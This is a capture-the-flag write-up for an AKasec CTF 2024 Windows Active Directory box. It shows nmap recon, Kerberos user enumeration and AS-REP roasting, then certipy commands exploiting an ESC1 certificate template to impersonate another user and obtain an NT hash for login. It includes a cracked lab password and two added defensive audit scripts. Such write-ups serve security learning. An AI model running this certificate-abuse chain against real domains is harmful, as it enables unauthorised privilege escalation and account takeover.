AKasec CTF 2024 ( English Writeup )


BOXS

Description

-> Start recon with a port scan to find the open ports and the services behind them

Result :

nmap -A -T4 172.200.160.57
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-08 21:54 +07
Nmap scan report for 172.200.160.57
Host is up (0.27s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-08 14:58:30Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: aka.sex, Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: aka
|   NetBIOS_Domain_Name: aka
|   NetBIOS_Computer_Name: akasec-ctf-2024
|   DNS_Domain_Name: aka.sex
|   DNS_Computer_Name: akasec-ctf-2024.aka.sex
|   DNS_Tree_Name: aka.sex
|   Product_Version: 10.0.17763
|_  System_Time: 2024-06-08T14:59:08+00:00
| ssl-cert: Subject: commonName=akasec-ctf-2024.aka.sex
| Not valid before: 2024-06-06T18:06:03
|_Not valid after:  2024-12-06T18:06:03
|_ssl-date: 2024-06-08T14:59:46+00:00; 0s from scanner time.
Service Info: Host: akasec-ctf-2024; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-06-08T14:59:06
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 326.45 seconds

Port 3268 (LDAP) and port 80 were tried next; port 80 only serves a static web page. (Kept as a possible reference for the following steps.)

Anonymous login to the SMB service is possible, but no shares are exposed, so there is nothing to take from it.

-> Brute-force valid Kerberos usernames; tool used: kerbrute

Partial brute force results

These usernames are valid, meaning they exist in the Active Directory of the aka.sex domain. Such accounts can be used for further techniques, such as password brute-forcing or attacks through other security weaknesses.

However, not every user is necessarily usable for the next step, so each user found here has to be tested. Valid user found: joseph.hughes@aka.sex

How to test: use the impacket toolkit, specifically impacket-GetNPUsers, which sends an AS-REQ for each user and returns the encrypted part of the AS-REP for accounts that do not require Kerberos pre-authentication (AS-REP roasting).

Get the hash of user joseph.hughes:

This user's hash can be cracked (with john or hashcat); I have already cracked it, so I will show the result:
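The account that impacket-GetNPUsers turns up is one whose userAccountControl attribute has the DONT_REQ_PREAUTH bit set. As an added example (not code from the writeup or from impacket), the following Python snippet shows the LDAP filter a defender can run against their own domain controller to list such accounts, decodes the relevant userAccountControl bits, and applies the check to constructed sample records; the account names and flag combinations in the sample are assumptions.

```python
"""Audit which accounts can be AS-REP roasted: those whose userAccountControl
has DONT_REQ_PREAUTH set (the condition impacket-GetNPUsers looks for)."""

# userAccountControl bit flags, as documented for the AD attribute
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# LDAP filter using the bitwise-AND matching rule (OID 1.2.840.113556.1.4.803),
# so the DC returns only users with DONT_REQ_PREAUTH (4194304 = 0x400000) set.
LDAP_FILTER = ("(&(objectCategory=person)(objectClass=user)"
               "(userAccountControl:1.2.840.113556.1.4.803:=%d))" % DONT_REQ_PREAUTH)


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return sorted(name for bit, name in UAC_FLAGS.items() if value & bit)


def roastable(accounts):
    """sAMAccountNames with pre-auth disabled.  Disabled accounts are left out:
    the KDC answers their AS-REQ with KDC_ERR_CLIENT_REVOKED, so no encrypted
    AS-REP material comes back for them."""
    return [
        a["sAMAccountName"]
        for a in accounts
        if a["userAccountControl"] & DONT_REQ_PREAUTH
        and not a["userAccountControl"] & ACCOUNTDISABLE
    ]


# Constructed sample records in the shape an LDAP search for
# (sAMAccountName, userAccountControl) would return; the values are hypothetical.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "joseph.hughes", "userAccountControl": 0x200 | 0x400000},
    {"sAMAccountName": "svc_old", "userAccountControl": 0x200 | 0x400000 | 0x2},
    {"sAMAccountName": "alice", "userAccountControl": 0x200 | 0x10000},
]

if __name__ == "__main__":
    print("LDAP filter:", LDAP_FILTER)
    for acct in SAMPLE_ACCOUNTS:
        print(acct["sAMAccountName"], decode_uac(acct["userAccountControl"]))
    print("AS-REP roastable:", roastable(SAMPLE_ACCOUNTS))
```

The fix on the defender's side is to clear "Do not require Kerberos preauthentication" on every account the filter returns, or to move such accounts to long random passwords if an application genuinely needs the setting.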

Look for vulnerable certificate templates that can be exploited:

certipy-ad find -scheme ldap -username joseph.hughes -password '!!fth!!692!!gyh!!67t!ha' -dc-ip 172.200.160.57 -stdout -vulnerable

Note: on Windows the tool is invoked as certipy, while the Kali package installs it as certipy-ad.

Full Result :

certipy-ad find -scheme ldap -username joseph.hughes -password '!!fth!!692!!gyh!!67t!ha' -dc-ip 172.200.160.57 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 40 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 15 enabled certificate templates
[*] Trying to get CA configuration for 'aka-akasec-ctf-2024-CA' via CSRA
[!] Got error while trying to get CA configuration for 'aka-akasec-ctf-2024-CA' via CSRA: Could not connect: [Errno 111] Connection refused
[*] Trying to get CA configuration for 'aka-akasec-ctf-2024-CA' via RRP
[!] Got error while trying to get CA configuration for 'aka-akasec-ctf-2024-CA' via RRP: [Errno Connection error (10.0.0.9:445)] timed out
[!] Failed to get CA configuration for 'aka-akasec-ctf-2024-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : aka-akasec-ctf-2024-CA
    DNS Name                            : akasec-ctf-2024.aka.sex
    Certificate Subject                 : CN=aka-akasec-ctf-2024-CA, DC=aka, DC=sex
    Certificate Serial Number           : 3BC6654FD035E194432B15722AFF99D6
    Certificate Validity Start          : 2024-06-09 12:06:25+00:00
    Certificate Validity End            : 2029-06-09 12:16:24+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
Certificate Templates
  0
    Template Name                       : 5777eb13-5939-4a48-8d46-8ae561da870a
    Display Name                        : 5777eb13-5939-4a48-8d46-8ae561da870a
    Certificate Authorities             : aka-akasec-ctf-2024-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : SubjectAltRequireDirectoryGuid
                                          EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 99 years
    Renewal Period                      : 650430 hours
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AKA.SEX\Domain Users
      Object Control Permissions
        Owner                           : AKA.SEX\Enterprise Admins
        Full Control Principals         : AKA.SEX\Domain Admins
                                          AKA.SEX\Local System
                                          AKA.SEX\Enterprise Admins
        Write Owner Principals          : AKA.SEX\Domain Admins
                                          AKA.SEX\Local System
                                          AKA.SEX\Enterprise Admins
        Write Dacl Principals           : AKA.SEX\Domain Admins
                                          AKA.SEX\Local System
                                          AKA.SEX\Enterprise Admins
        Write Property Principals       : AKA.SEX\Domain Admins
                                          AKA.SEX\Local System
                                          AKA.SEX\Enterprise Admins
    [!] Vulnerabilities
      ESC1                              : 'AKA.SEX\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
  1
    Template Name                       : 014ca453-3bea-405a-a9be-fbbada9e1d5a
    Display Name                        : 014ca453-3bea-405a-a9be-fbbada9e1d5a
    Certificate Authorities             : aka-akasec-ctf-2024-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 99 years
    Renewal Period                      : 650430 hours
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AKA.SEX\Domain Users
      Object Control Permissions
        Owner                           : AKA.SEX\Enterprise Admins
        Full Control Principals         : AKA.SEX\Domain Admins
                                          AKA.SEX\Local System
                                          AKA.SEX\Enterprise Admins
        Write Owner Principals          : AKA.SEX\Domain Admins
                                          AKA.SEX\Local System
                                          AKA.SEX\Enterprise Admins
        Write Dacl Principals           : AKA.SEX\Domain Admins
                                          AKA.SEX\Local System
                                          AKA.SEX\Enterprise Admins
        Write Property Principals       : AKA.SEX\Domain Admins
                                          AKA.SEX\Local System
                                          AKA.SEX\Enterprise Admins
    [!] Vulnerabilities
      ESC3                              : 'AKA.SEX\\Domain Users' can enroll and template has Certificate Request Agent EKU set
  2
    Template Name                       : e4bf4d28-76f8-4b2f-b491-7843c4223a92
    Display Name                        : e4bf4d28-76f8-4b2f-b491-7843c4223a92
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Smart Card Logon
                                          Server Authentication
                                          KDC Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 99 years
    Renewal Period                      : 650430 hours
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AKA.SEX\Domain Users
      Object Control Permissions
        Owner                           : AKA.SEX\Enterprise Admins
        Full Control Principals         : AKA.SEX\Domain Admins
                                          AKA.SEX\Local System
                                          AKA.SEX\Enterprise Admins
        Write Owner Principals          : AKA.SEX\Domain Admins
                                          AKA.SEX\Local System
                                          AKA.SEX\Enterprise Admins
        Write Dacl Principals           : AKA.SEX\Domain Admins
                                          AKA.SEX\Local System
                                          AKA.SEX\Enterprise Admins
        Write Property Principals       : AKA.SEX\Domain Admins
                                          AKA.SEX\Local System
                                          AKA.SEX\Enterprise Admins
    [!] Vulnerabilities
      ESC1                              : 'AKA.SEX\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

Take advantage of the two vulnerabilities found: ESC1 and ESC3

  • ESC1 (Enrollment Services Configuration 1):

    • Description: This vulnerability occurs when any user in the Domain Users group has permission to request a certificate from this template, and the template allows the requester to provide the Subject of the certificate. This may result in the issuance of certificates for Client Authentication purposes.

    • Affected Templates:

      • 5777eb13-5939-4a48-8d46-8ae561da870a

      • e4bf4d28-76f8-4b2f-b491-7843c4223a92 (This template is currently not enabled - Enabled: False)

  • ESC3 (Enrollment Services Configuration 3):

    • Description: This vulnerability occurs when any user in the Domain Users group has permission to request a certificate from this template, and the template has the Certificate Request Agent EKU set. This may allow the certificate requester to make further certificate requests on behalf of other users.

    • Affected Templates:

      • 014ca453-3bea-405a-a9be-fbbada9e1d5a
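As an added example (not code from the writeup or from Certipy), the following Python script parses the text that `certipy find -stdout` prints, re-derives the ESC1 and ESC3 conditions listed above from the template fields, and prints the template setting a defender would change. The embedded sample is a condensed copy of the three template blocks shown earlier; the list of groups treated as low-privileged and the remediation wording are my assumptions. Like Certipy 4.8.2, it still reports the disabled template e4bf4d28-... as ESC1, but it marks it as disabled so the fix can be made before anyone re-enables it.

```python
"""Re-derive ESC1/ESC3 findings from the text that `certipy find -stdout` prints."""
import re

# Constructed sample: a condensed copy of the three template blocks above,
# keeping certipy's layout (values start at column 42, continuation lines aligned).
SAMPLE = """\
Certificate Authorities
  0
    CA Name                             : aka-akasec-ctf-2024-CA
Certificate Templates
  0
    Template Name                       : 5777eb13-5939-4a48-8d46-8ae561da870a
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AKA.SEX\\Domain Users
  1
    Template Name                       : 014ca453-3bea-405a-a9be-fbbada9e1d5a
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
        Enrollment Rights               : AKA.SEX\\Domain Users
  2
    Template Name                       : e4bf4d28-76f8-4b2f-b491-7843c4223a92
    Enabled                             : False
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
        Enrollment Rights               : AKA.SEX\\Domain Users
"""

KEY_VALUE = re.compile(r"^(\s*)([A-Za-z][A-Za-z ]*?)\s*:\s*(.*)$")
INDEX = re.compile(r"^\s{2}(\d+)\s*$")          # "  0", "  1", ... open a template block
# Groups every domain account belongs to (assumed list); enrollment rights for these count as low-privileged
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}
REMEDIATION = {
    "ESC1": "clear EnrolleeSuppliesSubject, or require manager approval / an RA signature",
    "ESC3": "remove the Certificate Request Agent EKU, or restrict who can enroll",
}


def parse_templates(text):
    """Return one {field: [values]} dict per template in the 'Certificate Templates' section."""
    templates, current, section, last_key, value_col = [], None, None, None, 0
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):            # unindented line: section header
            section, current = line.strip(), None
        elif section != "Certificate Templates":
            continue
        elif INDEX.match(line):
            current, last_key = {}, None
            templates.append(current)
        elif current is None:
            continue
        elif (m := KEY_VALUE.match(line)):
            last_key, value_col = m.group(2), m.start(3)
            current[last_key] = [m.group(3)]
        elif last_key and len(line) - len(line.lstrip()) >= value_col:
            current[last_key].append(line.strip())  # continuation of a multi-valued field
    return templates                            # lines like "Permissions" are structure only


def flag(tpl, field):
    return tpl.get(field, ["False"])[0] == "True"


def audit(text):
    """Return (template name, ESC id, enabled) for each ESC1/ESC3 condition found."""
    findings = []
    for tpl in parse_templates(text):
        rights = {p.split("\\")[-1] for p in tpl.get("Enrollment Rights", [])}
        gated = (flag(tpl, "Requires Manager Approval")
                 or tpl.get("Authorized Signatures Required", ["0"])[0] != "0")
        if gated or not rights & LOW_PRIV:       # an approval step or no low-priv enrollment
            continue
        name, enabled = tpl["Template Name"][0], flag(tpl, "Enabled")
        client_auth = flag(tpl, "Client Authentication") or flag(tpl, "Any Purpose")
        if flag(tpl, "Enrollee Supplies Subject") and client_auth:
            findings.append((name, "ESC1", enabled))
        if flag(tpl, "Enrollment Agent"):
            findings.append((name, "ESC3", enabled))
    return findings


if __name__ == "__main__":
    for name, esc, enabled in audit(SAMPLE):
        state = "enabled" if enabled else "disabled (fix before re-enabling)"
        print(f"{esc} {name} [{state}]: {REMEDIATION[esc]}")
```

Run it against the saved output of `certipy find -stdout` to get the same three findings as above; on a domain you administer, the interesting output is the remediation column, since either a manager-approval step or removing EnrolleeSuppliesSubject on its own is enough to close ESC1.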

I will request a certificate from the template 5777eb13-5939-4a48-8d46-8ae561da870a:

certipy-ad req -username joseph.hughes@aka.sex -password '!!fth!!692!!gyh!!67t!ha' -target-ip aka.sex -ca 'aka-akasec-ctf-2024-CA' -template '5777eb13-5939-4a48-8d46-8ae561da870a' -upn 'kexa@aka.sex'

Obtain the certificate as a .pfx file:

  • Authenticate to AD:

Use the PFX certificate to authenticate to the Active Directory environment of the aka.sex domain through the Domain Controller at 172.200.160.57.

certipy-ad auth -pfx 'kexa.pfx' -username 'kexa' -domain 'aka.sex' -dc-ip 172.200.160.57

After obtaining the NT hash, you can log in to the server with it:

You can use impacket-smbexec to log in; crackmapexec also works.

Pwned !!!

The flag is in the Desktop folder of the user kexa:
